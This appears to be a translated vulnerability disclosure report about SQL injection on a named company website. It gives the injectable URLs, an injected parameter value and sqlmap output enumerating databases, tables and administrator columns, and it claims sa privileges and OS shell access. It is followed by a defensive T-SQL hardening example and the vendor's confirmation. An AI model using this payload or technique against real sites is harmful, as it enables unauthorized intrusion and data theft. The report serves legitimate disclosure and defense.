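2015-03-06: Details reported to the vendor; awaiting vendor handling
2015-03-10: Vendor confirmed; details disclosed to the vendor only
2015-03-20: Details disclosed to core white hats and experts in related fields
2015-03-30: Details disclosed to regular white hats
2015-04-09: Details disclosed to intern white hats
2015-04-20: Details disclosed to the public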
SQL injection with sa privileges; sqlmap executes os-shell
URL: http://www.gdyueyun.com/Stage/AnnualReport.aspx
Header information: head%24txtSearch=&hiddMonth=-1%27%20or%2081%20%3d%20%2779&hiddYear=&ImageButton1=&month=0&scSelect=0&txtNewsTitle=&year=0&__EVENTARGUMENT=2&__EVENTTARGET=AspNetPager1&__EVENTVALIDATION=…&__VIEWSTATE=…
http://www.gdyueyun.com/Stage/SearchPage.aspx?keywords=1*&languagetype=sc
A large number of databases:
available databases [17]:
[*] CopyOfRisk
[*] CopyOfRisk_0
[*] IGKICPOS
[*] master
[*] model
[*] msdb
[*] pams
[*] pams0720
[*] pams2
[*] PAMS_AddonsInfo
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] Test
[*] testny
[*] Web_YueYunTraffic
[*] Web_YueYunTraffic_Test

Database: Web_YueYunTraffic
[26 tables]
+-----------------------+
| AboutSafety           |
| AdminMenu             |
| AdminPageFunction     |
| Administrator         |
| AnnualReport          |
| CompanyGovernment     |
| ContactUs             |
| CultureGlimpse        |
| Custom                |
| EnterpriseBulletin    |
| EnterprisePublication |
| FinancialHighlights   |
| IndependentBuild      |
| IndustryNews          |
| LZBuild               |
| MembersNews           |
| Multilingual          |
| News                  |
| PFGarden              |
| PageFunction          |
| PartyBuild            |
| PoliciesRegulation    |
| PromotionalMaterial   |
| SocietySound          |
| Sys_Menu              |
| YouthActivity         |
+-----------------------+

Database: Web_YueYunTraffic
Table: Administrator
[12 columns]
+---------------+
| Column        |
+---------------+
| AddTime       |
| AdminAdress   |
| AdminAge      |
| AdminEmail    |
| AdminID       |
| AdminName     |
| AdminPhoneNum |
| AdminPwd      |
| AdminSex      |
| AdminStatus   |
| AdminTrueName |
| Type          |
+---------------+

Database: Web_YueYunTraffic
Table: Administrator
[4 entries]
Below are the usernames and passwords of the MSSQL database:
Below are some screenshots as proof:
Proof that the current user has sa privileges: True
MSSQL has 5 users:
sqlmap executing os-shell:
Fix it, please fix it quickly!!!
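As an added example (not part of the original report and not the vendor's fix), the T-SQL below audits the two conditions this report shows together, a web application login with sysadmin rights and OS command execution through xp_cmdshell, and then sets up a restricted login for the site. The login name web_reader, the dbo schema and the password placeholder are assumptions; Web_YueYunTraffic and AnnualReport are taken from the output above.

```sql
-- Added example, not from the original report.

-- 1. Run while connected with the web application's own connection string:
--    does the site talk to SQL Server as a sysadmin (e.g. sa)?
SELECT SUSER_SNAME()                AS current_login,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;   -- 1 means sysadmin

-- 2. Every login that holds sysadmin, so unexpected members stand out.
SELECT p.name, p.type_desc, p.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE r.name = N'sysadmin';

-- 3. Is OS command execution currently switched on?
SELECT name, value_in_use
FROM sys.configurations
WHERE name = N'xp_cmdshell';                          -- 1 means enabled

-- 4. Switch it off. A sysadmin login can turn it back on with the same
--    calls, so this step does not help while the site still connects as sa;
--    step 5 is the actual fix on the database side.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- 5. Give the website its own login with read access only to what the
--    public pages display. web_reader and dbo are assumed names; the
--    password is a placeholder to be replaced.
CREATE LOGIN web_reader WITH PASSWORD = '<replace-with-strong-password>';
USE Web_YueYunTraffic;
CREATE USER web_reader FOR LOGIN web_reader;
GRANT SELECT ON dbo.AnnualReport TO web_reader;

-- 6. Confirm what the new account can do before changing the site's
--    connection string to use it.
EXECUTE AS USER = 'web_reader';
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');
REVERT;
```

Least privilege limits what an injection can reach; the injectable parameters themselves still need parameterized queries in the page code.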
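Severity: High
Vulnerability Rank: 11
Confirmation time: 2015-03-10 09:56
Thank you very much for your report. The issue in the report has been confirmed and reproduced. Affected data: High; attack cost: Low; impact: High; overall rating: High, rank: 11. We are contacting the organization that manages the website to handle it.
None yet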